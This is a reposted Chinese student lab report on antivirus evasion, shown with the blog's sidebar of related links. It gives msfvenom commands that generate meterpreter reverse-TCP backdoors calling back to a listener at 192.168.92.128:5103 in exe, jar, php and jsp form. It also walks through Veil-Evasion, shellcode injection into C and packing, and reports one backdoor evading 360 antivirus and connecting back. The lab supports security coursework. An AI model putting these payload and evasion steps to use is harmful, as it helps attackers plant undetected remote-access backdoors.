Exp3 免杀原理与实践

最新推荐文章于 2024-07-31 00:00:00 发布
最新推荐文章于 2024-07-31 00:00:00 发布
阅读量184 收藏
点赞数
文章标签: 网络 java php
原文链接:http://www.cnblogs.com/8cloud33zzk/p/10632737.html
版权

Exp3 免杀原理与实践

3.1 基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 杀软是通过两种方式检测出恶意代码的。一种是基于特征码的方式,检测恶意代码中存在一些代表这种恶意代码特征的一段或多段数据,比较常见,但是由于是对现有恶意代码特征的匹配,所以对许多新型恶意代码特征更新不及时。另一种是基于行为(启发式)特征的检测方式,通过检测程序的行为是否属于恶意代码的行为来检测,这种检测方式更加及时,但缺点是这种检测方式对系统资源占用较大,所以不常见到。

(2)免杀是做什么?

  • 免杀是利用一些技术来对我们生成的后门程序进行编码加密或者是将行为合法化来达到消除特征隐藏行为的目的,从而使杀软检测不出来。

(3)免杀的基本方法有哪些?

  • 免杀基本方法也是针对检测方法来进行免杀的,一种就是改变特征码的方式,这种方式就是用shellcode半手动、加壳之类的手段。另一种方式是对行为进行改变,比如利用隧道技术改变通讯方式、或者减少对系统的操作等手段。

3.2 实践总结与体会

实验做到中间的时候,在利用virustotal和virscan两个平台上检测时看到确实有不少杀软做的不怎么样。实验做到最后,发现确实我们对一些软件进行加壳处理后杀软也没杀出来。分析杀软检测和免杀原理的时候确实感觉有种魔高一尺道高一丈的感觉(虽然这样用词不太准确),真正感觉到我们网络空间的安全性对于一般人真的有些薄弱,而我们学这样的技术一方面是在提高自己的网络安全技能和网络安全意识,一方面也是在试图用这样一种形式来让我们思考如何加强个人网络安全来抵御这样的攻击。

3.3.开启杀软能绝对防止电脑中恶意代码吗?

  • 显然不能,但是至少能杀一部分病毒,有还是比没有要强一些。。。

3.4 实验内容

  • 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程。
  • 通过组合应用各种技术实现恶意代码免杀。
  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。

3.5 实验步骤

3.5.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程

3.5.1.1 使用msf编码器,msfvenom生成如jar之类的其他文件
  1. 一次编码
  • 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.92.128 LPORT=5103 -f exe > zzk1.exe
    命令生成一次编码文件

1267683-20190331173515084-277780569.png

  • 进行一下检测

1267683-20190331173525043-2070280966.png

1267683-20190331173540528-1999564364.png

  1. 33次编码

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 33 -b ‘\x00’ LHOST=192.168.92.128 LPORT=5103 -f exe > zzk2.exe命令生成33次编码文件
    1267683-20190331195048070-270290272.png

  • 进行一下检测

1267683-20190331173755389-1411145636.png

1267683-20190331173708620-274812227.png

  1. msfvenom生成jar文件
  • msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.92.128 LPORT=5103 x> zzk3java.jar生成jar文件。

1267683-20190331173711367-1731637315.png

  • 检验一下

1267683-20190331173710972-1756887434.png

1267683-20190331173719052-867913754.png

  1. msfvenom生成php文件
  • 使用msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.92.128 LPORT=5103 x> zzk4php.php生成php文件。

1267683-20190331173916715-1179548443.png

  • 检验一下

1267683-20190331173908669-1914585589.png

1267683-20190331173908989-178048295.png

  1. msfvenom生成jsp文件
  • msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.92.128 LPORT=5103 -f raw > zzk6jsp.jsp命令生成
  • 检测一下
    1267683-20190331174053204-34681461.png

1267683-20190331174108834-793072235.png

3.5.1.2 使用veil-evasion生成后门程序

  • 安装veil
    1267683-20190331175933620-1913372001.png

  • 在展开时有点问题,找了同学的重新配置了一下

  • 输入use evasion命令进入到Evil-Evasion中,输入use c/meterpreter/rev_tcp.py选择载荷,继续配置。

1267683-20190331180150455-1297708117.png

1267683-20190331180041451-954362252.png

  • 使用set 命令设置端口和ip

1267683-20190331180352122-1385789852.png

  • 输入generate后输入文件名回车生成文件zzk8.exe

1267683-20190331180518051-329404964.png

  • 然后我们从/var/lib/veil/output/compiled/中就能看到我们的文件了!
  • 检验一下

1267683-20190331180800199-275565767.png

3.5.1.3 利用msf半手工注入Shellcode生成后门程序
  • 输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.128 LPORT=5103 -f c后生成一段shellcode,然后我们把它放到一个c程序中。

1267683-20190331181045619-365428620.png

1267683-20190331180953964-1142104729.png

  • 利用i686-w64-mingw32-g++ zzkshellcode1.c -o zzkshellcode1.exe命令将我们的c程序编译成为exe文件。

1267683-20190331180939484-1137285564.png

1267683-20190331180931474-30903755.png

  • 检验一下
3.5.1.4 利用加壳工具进行加壳
  • 首先是对程序加个压缩壳

1267683-20190331181138570-90022679.png

  • 稍微检测一下

1267683-20190331181149679-764353963.png

1267683-20190331181155640-184083437.png

  • 然后是再加个加密壳

1267683-20190331181246275-156404621.png

3.5.2 通过组合应用各种技术实现恶意代码免杀

  • 这里是运用了手工注入的shellcode后进行加壳,检测了一下发现还是好多可以杀出来。

1267683-20190331181300399-1491460090.png

1267683-20190331181341374-850459935.png

3.5.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  • 我做这个是直接把两个加过壳的都放到了另一台电脑上实验了一下,电脑上装有360杀毒
  • 杀软名称360杀毒,版本5.0.0.8150

1267683-20190331181457258-1555764299.png

  • 发现有一个成功没有被杀出来,成功实现回连!!

1267683-20190331193440433-161017434.png

1267683-20190331193510780-1666594725.png

1267683-20190331181739214-346329488.png

1267683-20190331193645096-2051409974.png
360 确实反映好快。。。。之前成功的过了一段时间就能被查出来了。。。。

转载于:https://www.cnblogs.com/8cloud33zzk/p/10632737.html

didu2358
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EXP3 原理实践
ISrookie的博客
04-06 575
exp3 原理
Python3中exp()函数用法分析
09-19
4. **与其他函数的结合**:`exp()`函数经常与其他的数学函数一起使用,如`log()`(自然对数)、`pow()`(幂运算)等,以解决更复杂的数学问题。例如,`exp()`和`log()`结合可以用来计算任意底数的指数,因为`log(a^b...
原理实践
05-27 197
MarkdownPad Document 原理实践 1.基础问题 (1)软是如何检测出恶意代码的? 1:基于特征码 一段特征码就是一段或多段数据。(如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码) 毒软件有自己专门的特征码库,在检测一个程序是否是恶意代码时就看这个程序中的是否包含有特征码库中的特征码,如果有就进行查。但是...
20145313原理实践
weixin_30632883的博客
03-21 100
问题回答 软是如何检测出恶意代码的? 使用特征码检测。特征码就是一类恶意程序中很大概率会有的代码部分,通过检测程序中是否有这部分即可判定是否是恶意程序。 通过行为检测,测试其是否有可疑行为。 通过恶意程序一般有的特征去判断。 是做什么? 即使用不同方法使得恶意程序不被软和防火墙发觉。 的基本方法有哪些? 利用加壳、多次编码等方式改变掩盖特征码。 改变自身可疑行为。如进行...
20155339 Exp3 原理实践
weixin_30672295的博客
04-08 121
20155339 Exp3 原理实践 基础问题 (1)软是如何检测出恶意代码的? 基于特征码的检测(软的特征库中包含了一些数据或者数据段,软会尽可能的更新这个特征库,以包括尽可能多的恶意代码,当一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码)。 启发式恶意软件检测(很简单,就是根据些片面特征去推断,也就是进行检测,当某个软件或者程序想干一些看起来...
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
id3lib.exp_release_Creating_id3lib_exp_
10-02
C++ library for creating and manipulating id3v1/2 tags.Copyright 2002 2003 Thijmen Klok
id3lib.exp_id3lib_Thomas!_exp_binaries_
10-03
This library is free software.C++ library for creating and manipulating id3v1/2 tags.Copyright 1999 2000 Scott Thomas HaugCopyright 2002 2003 Thijmen Klok
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 379
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
计算机网络—电路、分组、报文交换—图文详解
最新发布
喻师傅的学习笔记
07-31 437
计算机网络—三种交换方式图文详解
第三周:网络应用(上)
Vincent_Zhang233的博客
07-26 252
一、网络应用(层)内容概述我们已经知道,Internet的体系结构是符合TCP/IP协议栈的,而“应用层”就在这个协议的最上层。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 560
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
S5730举例
jjjxxxhhh123的博客
07-27 975
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
Python面试题:如何使用WebSocket实现实时Web应用
bigorsmallorlarge的专栏
07-30 333
通过上述步骤,你可以使用 Django Channels 和 WebSocket 创建一个简单的实时 Web 应用。Django Channels 提供了强大的功能,使得在 Django 中实现实时功能变得更加容易。你可以在此基础上扩展,添加更多功能和复杂的逻辑。
exp8266物联网开发板原理
05-26
ESP8266是一款高度集成的WiFi模块,它具有强大的处理能力和WiFi通信功能,常用于物联网设备的开发中。而ESP8266物联网开发板则是基于ESP8266模块设计的一款开发板,它集成了ESP8266模块、USB转串口芯片、电源管理芯片、按键、LED指示灯等组件,方便用户进行开发和调试。 ESP8266物联网开发板的原理是通过ESP8266模块实现与WiFi网络的连接,并通过串口与外部设备(如传感器、执行器等)进行通信,从而实现物联网设备的控制和数据传输。用户可以通过编程语言(如C语言、Python等)编写程序,控制ESP8266开发板的各个组件实现各种功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值